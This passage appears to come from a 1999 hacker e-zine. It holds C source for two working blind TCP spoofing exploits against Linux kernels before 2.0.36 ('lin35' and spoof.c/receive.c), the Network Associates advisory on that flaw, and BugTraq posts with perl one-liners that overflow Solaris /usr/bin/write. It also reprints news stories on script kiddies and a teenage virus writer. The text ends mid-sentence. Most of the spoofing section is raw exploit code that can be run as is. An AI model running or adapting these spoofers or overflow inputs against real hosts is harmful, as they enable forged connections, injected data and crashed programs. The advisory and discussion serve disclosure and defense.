#include <stdlib.h> #include <unistd.h> #include <sys/time.h> #include <libnet.h> int main(int argc, char **argv) { u_long dip = 0; u_long sip = 0; u_short dp = 0; u_short sp = 0; u_long seq; u_char *buf, *fbuf; int c, s, fp; unsigned long int fs; printf("lin35 - linux < 2.0.35 spoofer by sc!\n"); if (argc != 7) { printf("usage: %s shost sport dhost dport delay file\n", argv[0]); printf(" shost = source host (name or ip)\n"); printf(" sport = source port\n"); printf(" dhost = destination host\n"); printf(" dport = destination port\n"); printf(" delay = time to wait (in ms) between SYN and data and FIN\n"); printf(" file = filename to read data from\n"); exit(0); } sip = name_resolve(argv[1], 1); sp = atoi(argv[2]); dip = name_resolve(argv[3], 1); dp = atoi(argv[4]); fp = open(argv[6], O_RDONLY); if (fp == -1) { fprintf(stderr, "file not found\n"); exit(1); } fs = lseek(fp, 0, SEEK_END); if (fs == -1) { fprintf(stderr, "file end not found\n"); exit(1); } if (lseek(fp, 0, SEEK_SET) == -1) { fprintf(stderr, "cannot reset offset\n"); exit(1); } printf("[35] data file: %s - file size: %u\n", argv[6], fs); if (fs > (MAX_PACKET - (IP_H + TCP_H))) { fprintf(stderr, "file too big, exiting\n"); exit(1); } fbuf = malloc(fs); if (fbuf == NULL) { fprintf(stderr, "cannot load file to mem\n"); exit(1); } c = read(fp, fbuf, fs); if (c != fs) { fprintf(stderr, "cannot read file\n"); exit(1); } buf = calloc(1, TCP_H + IP_H); if (buf == NULL) { fprintf(stderr, "no memory for packet\n"); exit(1); } s = open_raw_sock(IPPROTO_RAW); if (s == -1) { fprintf(stderr, "cannot open raw socket\n"); exit(1); } seq = get_prand(PRu32); /* first initiate a connection */ printf("[35] opening connection, sending SYN\n"); build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP, sip, dip, NULL, 0, buf); build_tcp(sp, dp, seq, 0, TH_SYN, 16384, 0, NULL, 0, buf + IP_H); do_checksum(buf, IPPROTO_TCP, TCP_H); c = write_ip(s, buf, TCP_H + IP_H); if (c < TCP_H + IP_H) { fprintf(stderr, "send to less bytes\n"); exit(1); } /* now wait to let the connection establish */ usleep(atoi(argv[5]) * 1000); /* then send data packet */ printf("[35] sending data packet (%u bytes of data)\n", fs); buf = realloc(buf, TCP_H + IP_H + fs); if (buf == NULL) { fprintf(stderr, "memory\n"); exit(1); } build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP, sip, dip, NULL, 0, buf); build_tcp(sp, dp, seq + 1, 0, 0, 16384, 0, fbuf, fs, buf + IP_H); do_checksum(buf, IPPROTO_TCP, TCP_H); c = write_ip(s, buf, TCP_H + IP_H + fs); if (c < (TCP_H + IP_H + fs)) { fprintf(stderr, "send to less bytes (%d) for data packet\n", c); exit(1); } /* now wait again */ usleep(atoi(argv[5]) * 1000); /* and close the connection */ printf("[35] closing connection, sending FIN\n"); build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP, sip, dip, NULL, 0, buf); build_tcp(sp, dp, seq + 1 + fs, 0, TH_FIN, 16384, 0, NULL, 0, buf + IP_H); do_checksum(buf, IPPROTO_TCP, TCP_H); c = write_ip(s, buf, TCP_H + IP_H); if (c < TCP_H + IP_H) { fprintf(stderr, "send to less bytes\n"); exit(1); } printf("[35] successful\n"); free(fbuf); free(buf); return(0); } @HWA 05.1 TCP Blind Spoofing Exploit Code for Linux kernels 2.0.35< and Discussion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=- receive.c and spoof.c exploit code Hello, Here is some demonstration code for the "Linux Blind TCP Spoofing" problem discovered by Network Associates, Inc. If you have trouble compiling this, try it with -D_BSD_SOURCE. 1.) receive.c This simple program creates a TCP socket and waits for a connection. After the accept call returnes, it reads 8 bytes from the socket and prints them on stdout. usage: receive listen_port 2.) spoof.c This one sends a SYN packet, a Null packet (no flags at all) with 8 bytes of data and a FIN packet to the target. usage: spoof source_ip source_port target_ip target_port Don't forget to disable host source_ip so it cannot send RST's. I've tested this on Linux 2.0.30. After the FIN packet is received, the accept call returnes and the read call gives the data sent with the Null packet. !!This code is for educational purposes only!! ---------------------------- receive.c -------------------------- #include <stdio.h> #include <errno.h> #include <sys/socket.h> #include <unistd.h> #include <stdlib.h> #include <netinet/in.h> main(int argc, char *argv[]) { int i,n,dummy,new; struct sockaddr_in address,source_addr; char buffer[8]; address.sin_family = AF_INET; address.sin_port = htons(atoi(argv[1])); address.sin_addr.s_addr = 0; if((i=socket(AF_INET,SOCK_STREAM,6))<0) /*create socket*/ { perror("socket\n"); exit(1); } if((bind(i,(struct sockaddr *)&address,sizeof(struct sockaddr_in)))<0) { /*bind socket to address*/ perror("bind"); exit(1); } if((listen(i,2))<0) { perror("listen"); exit(1); } printf("listening on socket\n"); new=accept(i,(struct sockaddr *)&source_addr,&dummy); if(new>0) printf("connected!\n"); else { perror("accept"); exit(1); } fflush(stdout); n=read(new,buffer,8); printf("read %i bytes from socket\n",n); printf("message is: %s\n",buffer); } --------------------------------spoof.c--------------------------------- #include <stdio.h> #include <netinet/ip.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/tcp.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <asm/types.h> #define FIN 1 #define SYN 2 #define SEQ 20985 /*---------------Checksum calculation--------------------------------*/ unsigned short in_cksum(unsigned short *addr,int len) { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /*----------------------------------------------------------------------*/ /*------------Send spoofed TCP packet-----------------------------------*/ int send_tcp(int sfd,unsigned int src,unsigned short src_p, unsigned int dst,unsigned short dst_p,tcp_seq seq,tcp_seq ack, u_char flags,char *buffer,int len) { struct iphdr ip_head; struct tcphdr tcp_head; struct sockaddr_in target; char packet[2048]; /*the exploitation of this is left as an exercise..*/ int i; struct tcp_pseudo /*the tcp pseudo header*/ { __u32 src_addr; __u32 dst_addr; __u8 dummy; __u8 proto; __u16 length; } pseudohead; struct help_checksum /*struct for checksum calculation*/ { struct tcp_pseudo pshd; struct tcphdr tcphd; char tcpdata[1024]; } tcp_chk_construct; /*Prepare IP header*/ ip_head.ihl = 5; /*headerlength with no options*/ ip_head.version = 4; ip_head.tos = 0; ip_head.tot_len = htons(sizeof(struct iphdr)+sizeof(struct tcphdr)+len); ip_head.id = htons(31337 + (rand()%100)); ip_head.frag_off = 0; ip_head.ttl = 255; ip_head.protocol = IPPROTO_TCP; ip_head.check = 0; /*Fill in later*/ ip_head.saddr = src; ip_head.daddr = dst; ip_head.check = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr)); /*Prepare TCP header*/ tcp_head.th_sport = htons(src_p); tcp_head.th_dport = htons(dst_p); tcp_head.th_seq = htonl(seq); tcp_head.th_ack = htonl(ack); tcp_head.th_x2 = 0; tcp_head.th_off = 5; tcp_head.th_flags = flags; tcp_head.th_win = htons(0x7c00); tcp_head.th_sum = 0; /*Fill in later*/ tcp_head.th_urp = 0; /*Assemble structure for checksum calculation and calculate checksum*/ pseudohead.src_addr=ip_head.saddr; pseudohead.dst_addr=ip_head.daddr; pseudohead.dummy=0; pseudohead.proto=ip_head.protocol; pseudohead.length=htons(sizeof(struct tcphdr)+len); tcp_chk_construct.pshd=pseudohead; tcp_chk_construct.tcphd=tcp_head; memcpy(tcp_chk_construct.tcpdata,buffer,len); tcp_head.th_sum=in_cksum((unsigned short *)&tcp_chk_construct, sizeof(struct tcp_pseudo)+sizeof(struct tcphdr)+len); /*Assemble packet*/ memcpy(packet,(char *)&ip_head,sizeof(ip_head)); memcpy(packet+sizeof(ip_head),(char *)&tcp_head,sizeof(tcp_head)); memcpy(packet+sizeof(ip_head)+sizeof(tcp_head),buffer,len); /*Send packet*/ target.sin_family = AF_INET; target.sin_addr.s_addr= ip_head.daddr; target.sin_port = tcp_head.th_dport; i=sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct tcphdr)+len,0, (struct sockaddr *)&target,sizeof(struct sockaddr_in)); if(i<0) return(-1); /*Error*/ else return(i); /*Return number of bytes sent*/ } /*---------------------------------------------------------------------*/ main(int argc, char *argv[]) { int i; unsigned int source,target; unsigned short int s_port,d_port; char data[]="abcdefg"; source=inet_addr(argv[1]); s_port=atoi(argv[2]); target=inet_addr(argv[3]); d_port=atoi(argv[4]); if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) /*open sending socket*/ { perror("socket"); exit(1); } send_tcp(i,source,s_port,target,d_port,SEQ,0,SYN,NULL,0); printf("SYN sent\n"); usleep(1000); send_tcp(i,source,s_port,target,d_port,SEQ+1,0,0,data,8); /*no flags set*/ printf("data sent\n"); usleep(1000); send_tcp(i,source,s_port,target,d_port,SEQ+9,0,FIN,NULL,0); printf("FIN sent\n"); close(i); } -- Jochen Bauer Institute for Theoretical Physics University of Stuttgart Germany PGP public key available from: http://www.theo2.physik.uni-stuttgart.de/jtb.html -=- further discussion; Date: Tue, 9 Mar 1999 16:28:24 -0800 From: Security Research Labs <seclabs@NAI.COM> To: BUGTRAQ@netspace.org Subject: Linux Blind TCP Spoofing [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ====================================================================== = Network Associates, Inc. SECURITY ADVISORY March 9, 1999 Linux Blind TCP Spoofing ====================================================================== = SYNOPSIS An implementation flaw in the Linux TCP/IP stack allows remote attackers to forge TCP connections without predicting sequence numbers and pass data to the application layer before a connection is established. ====================================================================== = VULNERABLE HOSTS This problem is present in Linux kernels up to and including 2.0.35. Any distribution containing a kernel revision less than this is vulnerable. ====================================================================== = DETAILS TCP is a reliable connection-oriented protocol which requires the completion of a three way handshake to establish a connection. To implement reliable and unduplicated delivery of data, the TCP protocol uses a sequence based acknowledgment system. During connection establishment each host selects an initial sequence number which is sent in the first packet of the connection. Each subsequent byte transmitted in the TCP connection is assigned a sequence number. To prevent duplicate or invalid segments from impacting established connections TCP utilizes a state based model. In a typical client-server application, the client initiates a connection by transmitting a TCP segment to a listening server process. This causes the state of the process to move from the LISTEN state into SYN_RECEIVE if a SYN flag is present. During this state the server acknowledges the clients request setting both the SYN and ACK flags. To complete the three way handshake the client acknowledges the servers response, moving the server from SYN_RECEIVE to ESTABLISHED state. To establish a forged TCP session an attacker must have knowledge of or be able to predict the initial sequence number that is selected by the server. An implementation flaw in the Linux kernel allows data to be delivered to the application layer before the handshake has completed. ====================================================================== = TECHNICAL DETAILS The combination of three flaws in the Linux TCP/IP implementation contribute to the existence of a security vulnerability. Firstly, Linux only verifies the acknowledgment number of incoming segments if the ACK flag has been set. Linux also queues data from TCP segments without acknowledgment information prior to the completion of the three way handshake but after the initial SYN has been acknowledged by the server. Finally, Linux passes data to the application layer upon the receipt of a packet containing the FIN flag regardless of whether a connection has been established. Together, these flaws allow an attacker to spoof an arbitrary connection and deliver data to an application without the need to predict the servers initial sequence number. According to the standard, there is only one case wherein a correct TCP/IP stack can accept data in a packet that does not have the ACK flag set --- the initial connection-soliciting SYN packet can contain data, but must not have the ACK flag set. In any other case, a data packet not bearing the ACK flag should be discarded. When a TCP segment carries an ACK flag, it must have a correct acknowledgement sequence number (which is the sequence number of the next byte of data expected from the other side of the connection). TCP packets bearing the ACK flag are verified to ensure that their acknowledgement numbers are correct. Vulnerable Linux kernels accept data segments that do not have the ACK flag set. Because the ACK flag is not set, the acknowledgement sequence number is not verified. This allows an attacker to send data over a spoofed connection without knowing the target's current (or initial) sequence number. Linux does not deliver data received from a TCP connection when the connection is in SYN_RECEIVE state. Thus, an attacker cannot successfully spoof a TCP transaction to a Linux host without somehow completing the TCP handshake. However, an implementation flaw in some Linux kernels allows an attacker to bypass the TCP handshake entirely, by "prematurely" closing it with a FIN packet. When a FIN packet is received for a connection in SYN_RECEIVE state, Linux behaves as if the connection was in ESTABLISHED state and moves the connection to CLOSE_WAIT state. In the process of doing this, data queued on the connection will be delivered to listening applications. If the ACK flag is not set on the FIN segment, the target's sequence number is not verified in the segment. ====================================================================== = RESOLUTION It is recommended that kernels below version 2.0.36 be upgraded to eliminate this vulnerability. Updated kernel packages for Red Hat Linux which are not vulnerable to this problem are available from http://www.redhat.com/support/docs/errata.html. Both Debian and Caldera Linux have been contacted regarding this vulnerability although no official response has been received. The latest stable versions of the Linux kernel are available from http://www.kernel.org. ====================================================================== = CREDITS Analysis and documentation of this problem was conducted by Anthony Osborne with the Security Labs at Network Associates. This vulnerability was discovered on the October 5, 1998. ====================================================================== = ABOUT THE NETWORK ASSOCIATES SECURITY LABS The Security Labs at Network Associates hosts some of the most important research in computer security today. With over 30 published security advisories published in the last 2 years, the Network Associates security auditing teams have been responsible for the discovery of many of the Internet's most serious security flaws. This advisory represents our ongoing commitment to provide critical information to the security community. For more information about the Security Labs at Network Associates, see our website at http://www.nai.com or contact us at <seclabs@nai.com>. ====================================================================== = NETWORK ASSOCIATES SECURITY LABS PGP KEY - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 5.5.5 mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC 8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh 01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p 2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4 QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ =L3C6 - ---- -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNvLqq6F4LLqP1YESEQJH5QCg4FIv1+eRED+wYV5uMp2nVto/zHMAnjii g3Q3t36ITPBKkdRCQGK4DCBe =yLGh -----END PGP SIGNATURE----- -------------------------------------------------------------------------- Date: Wed, 10 Mar 1999 12:17:25 -0800 From: John D. Hardin <jhardin@WOLFENET.COM> To: BUGTRAQ@netspace.org Subject: Re: Linux Blind TCP Spoofing (fwd) ---------- Forwarded message ---------- Date: Wed, 10 Mar 1999 19:46:13 +0000 (GMT) >From: Alan Cox <alan@lxorguk.ukuu.org.uk> To: jhardin@WOLFENET.COM Subject: Re: Linux Blind TCP Spoofing > > It is recommended that kernels below version 2.0.36 be upgraded to > > eliminate this vulnerability. > > This implies but does not explicitly state that 2.0.36+ kernels are > not vulnerable. Is this the case? NAI reported the problem to me during the 2.0.36 development period and the bug was squashed. @HWA 06.0 Solaris 2.6 x86 /usr/bin/write buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 8 Mar 1999 15:30:36 +0900 From: bugscan@KOSNET.NET To: BUGTRAQ@netspace.org Subject: Solaris "/usr/bin/write" bug This is my first post to BugTraq If this is old, I'm sorry. when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something interesting. It's buffer overflow bug in "/usr/bin/write" To ensure, view this command : ( Solaris 2.6 x86 ) [loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'` [loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx permission denied [loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 98'` Segmentation fault ( Solaris 2.5.1(2.5) sparc ) [love]/home/love> write loveyou `perl -e 'print "x" x 79'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx permission denied [love]/home/love> write loveyou `perl -e 'print "x" x 80'` Segmentation Fault ( Solaris 2.6 and 2.7 maybe .. ) bye bye ~ :) ---------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 17:16:26 +0000 From: John RIddoch <jr@SCMS.RGU.AC.UK> Reply-To: John Riddoch <jr@master.scms.rgu.ac.uk> To: BUGTRAQ@netspace.org Subject: Re: Solaris "/usr/bin/write" bug >when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something > interesting. >It's buffer overflow bug in "/usr/bin/write" >To ensure, view this command : > >( Solaris 2.6 x86 ) >[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'` >[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'` >xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx >( Solaris 2.6 and 2.7 maybe .. ) This also segfaults under Solaris 2.6 and 7 on SPARC. I'm not sure how exploitable this is, as it is only sgid tty, which isn't a huge problem (but could be nonetheless, I suppose). -- John Riddoch Email: jr@scms.rgu.ac.uk Telephone: (01224)262730 Room C4, School of Computer and Mathematical Science Robert Gordon University, Aberdeen, AB25 1HG I am Homer of Borg. Resistance is Fu... Ooooh! Donuts! ---------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 21:22:17 -0600 From: Chris Tobkin <tobkin@umn.edu> To: BUGTRAQ@netspace.org Subject: Re: Solaris "/usr/bin/write" bug > ( Solaris 2.6 and 2.7 maybe .. ) (Solaris 2.7 x86) [tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 93'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx permission denied [tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 94'` Segmentation fault (Solaris 2.6 sparc) [tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 91'` xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxx permission denied [tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 92'` Segmentation fault Looks like 2.6 for sparc and 2.7 intel have the same problem... // chris tobkin@umn.edu ************************************************************************* Chris Tobkin tobkin@umn.edu Java and Web Services - Academic and Distributed Computing Services - UMN ----------------------------------------------------------------------- Laura: I took a business course at business college-- Jim: How did that work out? Laura: Well, not very well...I had to drop out, it gave me...indigestion. - Tennessee Williams - The Glass Menagerie ************************************************************************* ---------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 15:45:16 +0000 From: Dan - Sr. Admin <dm@GLOBALSERVE.NET> To: BUGTRAQ@netspace.org Subject: Re: Solaris "/usr/bin/write" bug > This is my first post to BugTraq > If this is old, I'm sorry. > when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something > interesting. > It's buffer overflow bug in "/usr/bin/write" > To ensure, view this command : [snip] > ( Solaris 2.6 and 2.7 maybe .. ) > > bye bye ~ :) Confirmed under Sparc Solaris 2.6. Although I have no source code to verify this, I would assume the problem lies in a sprintf() call (or something similiar) that builds the device to open from the tty you specify on the command line. However, even if this is overflowable into a shell with tty permissions, I can see nothing useful coming out of it. crw--w---- 1 dm tty 24, 0 Mar 9 14:39 pts@0:0 Those are the permissions on the terminal. The most I can see happening is someone writing to my screen when I have messages turned off. Regards, -- Dan Moschuk (TFreak!dm@globalserve.net) Senior Systems/Network Administrator Globalserve Communications Inc., a Primus Canada Company "Be different: conform." @HWA 07.0 New Computer Technology Makes Hacking a Snap - Washington Post ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FUD throughout this article on script kiddies, but still a good entertaining read and worthy of your time ... http://www.washingtonpost.com/wp-srv/WPcap/1999-03/10/024r-031099-idx.html New Computer Technology Makes Hacking a Snap By Michael E. Ruane Washington Post Staff Writer Wednesday, March 10, 1999; Page A01 Used to be you had to have some know-how to crash a kernel. It would take all night to snoop a connection, smash a stack or crack a password. You could work forever trying to get to root. Not any more. Nowadays, any fresh-faced newbie can download a kiddie script, fire off a vulnerability scan and, in no time, come up with a nice, juicy target list. It's enough to make veteran hackers -- the handful of computer wizards who speak a colorful language that once was all their own -- break down and cry. But it's true. Along with the breathtaking advances in computer technology has come a vast proliferation of easy, ready-to-use computer hacking programs, freely available on the Internet, and a boon to greenhorn hackers. "This is your nephew or your cousin," says Peter Tippett, president of the Reston-based International Computer Security Association. "It's a kid who says, 'This seems kind of cool. Let me just take this tool and aim it at Ford Motor Company.' " They use programs -- called "exploits," "tools" or "attacks" -- with names like "Smurf," "Teardrop" and "John the Ripper." Some are so-called "denial of service" programs, which sneak or barge in and overwhelm a targeted system, shutting it down. Others are "vulnerability scanners," which search the Net for specific weaknesses to be exploited later. Still others are "penetration" attacks that break in and take control. Some attacks use a "Trojan Horse" -- benign-looking bait with an exploit concealed inside. Others "spoof," using a bogus ID. Still others lie in wait and spring when an unsuspecting victim pauses to visit. A few are simply sent out to "sniff the traffic" on the Internet. There are hundreds of them. So many that some have been given the name kiddie scripts, because of their simplicity of use. Those who launch them are called, of course, script kiddies. And experts say they may account for 95 percent of all external computer hacking attacks. Hacking always seems to have been the purview of the young. Just last year, five teenagers hacked into Defense Department computers, and last month, a 15-year-old from Vienna was accused of hacking into Clemson University's system and of trying to break into NASA's. Experts believe there are now tens of thousands of hacking-related Web sites, and hundreds that approach the subject seriously. The Pentagon, traditionally the most assailed hacking target on Earth, announced Friday that it is investigating another potent attack -- one of the 80 to 100 it undergoes every day. But in years past, hacking was tedious, demanding work that required brains and dedication, and, if successful, was an envied notch in the cyber gun. There was hacker esprit. There was a great "signal-to-noise" ratio -- intelligent talk vs. baloney. And there was the hacker code: Look, but don't touch. No longer. "It used to be a small circle," says Dr. Mudge, a veteran Boston-area hacker who operates a Web site with his sidekicks Kingpin, Brian Oblivion, SpaceRogue and others. "Now it's almost mainstream, and like anything that goes mainstream you get a lot of good and a lot of bad." "Now people can hack without having to pay their dues," says Rob Clyde, a vice president with the Rockville-based computer security firm, Axent Technologies Inc. "You no longer have to be an expert," he says. "You just have to have time and motive. And the motive often times now is vandalism, destruction, just blow away stuff, destroy it, make it look bad." Sometimes it's even worse. The FBI on Friday released an annual survey that it conducts with the San Francisco-based Computer Security Institute, reporting that criminal hacking caused $123 million in losses last year, and now posed "a growing threat to . . . the rule of law in cyberspace." Mostly, though, many experts say, the new add-water-and-stir hacking is for amateurs. And most of them are still pretty young. "We're talking 95 percent of hackers are script kiddies," Tippett says. "We're talking a million events a month where people run those tools to see what happens. Maybe one or two percent of hackers are people who know what the tool actually does." Peter Mell, a computer scientist at the National Institute of Standards and Technology, in Gaithersburg, says, "Ten years ago if you wanted to break into somebody's system, you would stay up all night long." "You would manually go to their computer, try a few things, if it didn't work you'd go to another computer, try a few things," he says. "Very tedious. You'd spend all night doing it." "Nowadays what somebody does is . . . at 6 o'clock, they download a vulnerability scanner and an associated attack. They set the vulnerability scanner running. They go out to a party . . . come home 11 at night. And their computer has compiled a list for them of 2,000 hosts on the Internet which are vulnerable to that attack." "All they have to do is type the name of the computer that is vulnerable into their attack script, and they have complete control of the enemy," he says. The actual damage done by hackers is uncertain and some experts suggested it is overstated by a computer industry eager to sell its services. Those experts estimate that 80 percent of hacking comes from within a corporation rather than through outside attacks. Hacking lingo seems filled with military references like "attack" and "target." But hacking also has -- along with its own magazines and an annual convention -- an idiom all its own. "Crashing a kernel," for example, refers to breaking down the core of an operating system. "Smashing a stack" means taking over a vital part of a computer's memory. "Snooping a connection" means breaking into a conversation between two other computers. And the ultimate feat, "getting to root," or more simply, "getting root," means seizing fundamental control of target system. Mell, 26, a surgeon's son from St. Louis who said his brother taught him to program in second grade, has conducted a study of published attacks that smash, crash, seize and snoop by monitoring what people request at hacker Web sites. He has named the array of published attacks the Global Attack Toolkit. And he has compiled a list of the top 20 recently most popular. He points out that most attacks can be defended with so called "patches," but a few are almost indefensible. One of the most popular -- number 2 on his list -- and one that's tough to counter is "Smurf." "It's an attack where you overwhelm an enemy system with a huge number of (information) packets . . . and their computer simply can't handle all of the packets," he says. "The computer shuts down. If it's a Web site, the Web site stops working. If it's the router going into the White House, the White House traffic stops flowing." Number one on his list was a Trojan Horse called "Back Orifice." In a paper he wrote last year, Mell mentioned one hacker Web site that lists 690 scripts, another that has 383 and another that lists 556. "Together, the exploit script Web sites form an attack tool kit that is available to literally everyone in the world," he wrote. "Somewhere on the Internet, there exists a host vulnerable to almost every attack, and scanning tools are readily available to find that host." Mell says the attack scripts are posted on hacker Web sites by other hackers, by disgruntled systems administrators trying to draw attention, and eventually patches, to holes in their systems, and by "white hat" hackers seeking to alert the computer security industry to vulnerabilities. And he believes that posting easy scripts may not be all bad. "When attacks are posted to the Internet, companies respond, and they fix their software very quickly, and they release patches, and there's news articles and advisories alerting people that there's this vulnerability," he says. "So by the public posting . . . in a way it makes the world safer, because everybody knows what's out there and they're prepared," he says. "If the scripts weren't published, intrusion-detection companies wouldn't know where to get their data, security companies wouldn't know that their applications had holes in them." "At the same time that these attack scripts make it available for anyone in the world with very little intelligence to download and run attacks, it also means that security companies are quick on their feet to respond to them." But computer security firms are not sitting idly by. They have their own intrusion detection programs -- some of which are recon missions, if you will, that "sniff" the traffic to ambush roving attack scripts. Mell says there is a "Virtual Suicide" Web site where systems operators can request an attack to test security. Visitors can ask to be "crippled," "beheaded" or "vaporized." Perhaps the most sinister attacks, though, are passive. Apparently small in number, Mell says in his report, they "require a target to visit the hacker's Web site" before striking. Soon, he writes, "the Internet may develop 'bad parts of town.'" "Watch where you walk!" � Copyright 1999 The Washington Post Company @HWA 08.0 "Super Hacker Apprehended" ~~~~~~~~~~~~~~~~~~~~~~~~~~ Seen initially on Help Net Security's site the article is printed here below; KOREAN "SUPERHACKER" BUSTED by deepcase, Tuesday 9th Mar 1999 on 1:05 pm CET Kim, a 15 year old high school student from Korea got busted by the police after after 152 people complained about the "super viruses" that he distributed by email. Kim told police that he mailed the viruses to demonstrate his talents and to find out if anyone could break them. The viruses were so complex that they were virtually impossible to kill. The spokesman said that Kim was known as a computer genius from the 7th grade, when he learned to handle the machine code language assembly 3. The spokesman added "Kim is one of just forty to fifty people in Korea with such a talent" . A National Police Officier said that Kim could have became a "national treasure" in the information society of the future and that he will guide Kim along the legal path of computer work. Referenced url: http://www.chosun.com/w21data/html/news/199903/199903050334.html Super Hacker Apprehended A police spokesman announced Friday that officers had apprehended a super hacker who turned out to be a fifteen year old high school boy named Kim. To date 152 people have filed complaints about the 15 super viruses Kim created and e-mailed, but police expect the final figure to be over 2,000. Kim told police that he mailed the viruses to demonstrate his talents and to find out if anyone could develop a 'vaccine' for them. The viruses were so complex that they were virtually impossible to kill. The spokesman said that Kim was known as a computer genius from the 7th grade, when he learned to handle the machine code language 'assembly 3'. one of just forty to fifty people in Korea with such a talent. Yang Keun-won, head of the National Police Office's computer crime team commented that a virus creator and hacker like 